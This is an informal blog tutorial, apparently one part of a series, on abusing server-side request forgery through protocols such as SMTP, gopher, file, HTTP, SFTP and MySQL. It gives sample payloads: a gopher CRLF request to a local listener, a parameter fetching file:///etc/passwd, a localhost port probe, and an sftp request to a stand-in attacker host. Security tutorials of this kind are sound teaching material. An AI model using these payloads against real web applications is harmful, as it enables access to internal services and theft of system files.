protocol and it’s types
hey folks? what’s up hope you are well in pandemic First of all i want to apologize for writing article lately because i was busy in making project in python 3soon I will release my tool stay tuned I am not here to advertise my tool XD nor you to see my adverstisment. So in this section i will cover protocol exploitation with ssrf we can exploit protocols like gopher,http,mysql,intranet,smtpetc. to attack on web application and stealing data and abuse web application This section and upcoming section gonne be on advance level of ssrf if you have any concept related to ssrf first clear it via previous two parts before diving into the exploiting protocols let’s clear about basic definition and working of these protocol There are lots of protocols but as you know i hate long articles so i cover up only main protocols definition and rest of protocols i leave on you to resarch :) Protocols And Its Types Basically what are protocols? protocols are nothing it’s just a set of rules for exchanging data. There are many protocols available for transferring files(ftp), for mailing(smtp), for calling(voip) etc. are used since this article is on exploiting ssrf we will talk about those protocls which are abused by ssrf for exploiting web application
Exploitation
let’s break these protocols with the help of ssrf ^_^ SMTP(simple mail transfer protocol)- for sending,receiving email thanx to this guy we have a unique way for exploiting smtp Probably an obvious SSRF trick for pros but I just figured out:)
1. cononnect with SSRF on smtp localhost:25
2 from the first line get the internal domain name 220 http://blabla.internaldomain.com ESMTP Sendmail
3 search http://internaldomain.com on github, find subdomains
4 connect
there are other various techniques for exploiting smtp like creating a payload and host it on server then send mail you can read awesome article
- gopher -
as we all know gopher is very old protocols used for fetching files on webserver but it got very very old since its not used in wide number of applications but with ssrf we can exploit gopher and http as in previous article i said unsanitized data leads to file fetching but why the files are fetched?? just because of these protocols
Gopher exploitation is very vast we can exploit http,redis,telnet,ftp and many more here is a awesome tool which create payloads for these protocols. We can’t cover all gopher exploitation in this article because it won’t possible if i gonna cover it took very much time and article gonna long and long I will explain all exploitation techniques on gopher separately in next article In this article i will depict basic exploitation of gopher if you wanna learn advance level exploitation of gopher you can read it here
```
$gopher://
: / $ curl gopher://localhost:2222/hello%0agopher
$ nc -lvvp 2222 listening on [any] 2222 … connect to [127.0.0.1] from localhost [127.0.0.1] 34116 ello gopher ``` that’s how we do the basic level exploitation of gopher with crlf (carriage return line and feed) we can use gopher to exploit mysql,redis,http,smtp and so on I will show and explain every techinque in Unique article dedicated to gopher exploitation
3.file:// basically it fetches files from external resources we can exploit it with replacing a file with our payload www.justfortest.com?php?fetch=file:///etc/passwd it will show content of /etc/passwd file which contains system id of admin and user
4.HTTP(hyper text transfer protocol) I don’t think that it’s a topic of explain XD let’s come at exploitation www.justfortest.com?php?url=http://localhost:21 it will fetch content of localhost to hacker
5.SFTP(secure file transfer protocol) protocol used in sending files securely www.justfortest.com?url=sftp://evul.com:3333
6.mysql protocol used between mysqlclient and server well, i can’t explain better then this read this article That’s all for today i covered all various protocol for exploiting with the help of ssrf In next article i will do chaining of ssrf with critical and some low level bugs and if there is any mistake or i forgot to mention any important protocol then let me know in comments :)